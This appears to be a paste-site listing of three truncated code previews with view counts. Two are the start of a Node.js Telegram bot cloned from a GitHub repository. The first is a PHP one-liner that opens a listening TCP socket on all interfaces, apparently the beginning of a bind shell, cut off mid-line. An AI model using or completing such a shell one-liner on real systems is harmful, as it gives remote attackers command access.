php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",19591);socket_listen($s,1);$cl=socket_acc…
221 viewsClone Of https://github.com/rasitechchannel/RasiTechRobot const TelegramBot = require("node-telegram-bot-api"); const mo…
3361 viewsClone Of https://github.com/rasitechchannel/RasiTechRobot const TelegramBot = require("node-telegram-bot-api"); const mo…
243 views